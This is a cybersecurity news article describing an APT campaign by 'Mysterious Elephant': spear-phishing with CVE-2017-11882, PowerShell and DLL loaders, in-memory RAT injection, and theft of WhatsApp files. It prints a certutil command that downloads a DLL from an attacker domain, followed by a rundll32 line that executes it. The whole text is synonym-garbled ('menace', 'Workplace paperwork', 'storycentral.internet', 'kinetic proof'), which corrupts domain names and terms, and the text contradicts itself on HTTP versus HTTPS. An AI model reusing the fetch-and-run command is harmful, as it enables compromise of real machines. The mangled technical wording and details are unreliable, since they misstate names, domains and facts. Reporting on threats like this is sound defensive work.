In current months, a brand new superior persistent menace (APT) group referred to as Mysterious Elephant has emerged as a formidable adversary concentrating on authorities and diplomatic establishments throughout the Asia-Pacific area.
First recognized by Kaspersky’s International Analysis and Evaluation Crew (GReAT) in 2023, the group has continued to refine its toolkit, using each custom-built malware and modified open-source utilities to evade detection and preserve long-term entry.
Early indicators pointed to easy phishing lures delivering weaponized paperwork, however the newest marketing campaign displays a major evolution in each supply mechanisms and post-exploitation tooling.
Preliminary incursions leveraged spear-phishing emails embedding malicious Workplace paperwork exploiting CVE-2017-11882.
Upon person interplay, these paperwork drop a light-weight PowerShell loader that retrieves extra complicated payloads from attacker-controlled infrastructure. This loader, dubbed BabShell, serves as the muse of the menace actor’s modular framework.
Because the marketing campaign progressed into 2025, Mysterious Elephant built-in a second-stage loader, MemLoader HidenDesk, to inject distant entry trojans immediately into reminiscence, lowering forensic artifacts on disk.
Securelist analysts famous that subsequent phases of the operation give attention to exfiltrating delicate WhatsApp information, together with paperwork, photographs, and archives, utilizing {custom} exfiltrators named Uplo Exfiltrator and Stom Exfiltrator.
Mysterious Elephant spear phishing electronic mail (Supply – Securelist)
These parts encode stolen information with XOR-based obfuscation earlier than transmitting it by way of HTTP to wildcard DNS domains reminiscent of storycentral.internet and monsoonconference.com.
By leveraging official domains and HTTPS, the group blends malicious visitors with regular company internet use, complicating network-based detection.
# Obtain and execute BabShell payload
certutil -urlcache -f “hxxp://storycentral.internet/BabShell.dll” BabShell.dll
rundll32.exe BabShell.dll,EntryPoint
An infection Mechanism
The an infection chain begins with a spear-phishing electronic mail containing a seemingly benign assembly invitation in an RTF doc.
When opened, the doc triggers a reminiscence corruption vulnerability within the Workplace Equation Editor (CVE-2017-11882), silently spawning a PowerShell course of.
This PowerShell occasion operates in hidden mode (-nop -w hidden) and makes use of .NET’s WebClient class to fetch the BabShell DLL loader.
As soon as loaded, BabShell decrypts its embedded configuration, which incorporates C2 URLs and module names, earlier than invoking its EntryPoint export to ascertain a heartbeat channel.
After preliminary beaconing, BabShell fetches the MemLoader HidenDesk module, injecting it right into a system service course of.
This in-memory loader parses a {custom} packet format, decompresses the RAT payload (a variant of Remcos), and transfers execution to the newly mapped code.
By avoiding disk writes, MemLoader HidenDesk considerably diminishes kinetic proof, permitting Mysterious Elephant to navigate laterally and harvest goal information undetected.
The group’s use of open-source codebases, mixed with proprietary modifications, underscores each resourcefulness and technical sophistication.
Via these multi-stage an infection ways, Mysterious Elephant continues to refine its method, demanding equally adaptive protection methods from safety groups tasked with safeguarding delicate data.
Observe us on Google Information, LinkedIn, and X to Get Extra On the spot Updates, Set CSN as a Most well-liked Supply in Google.
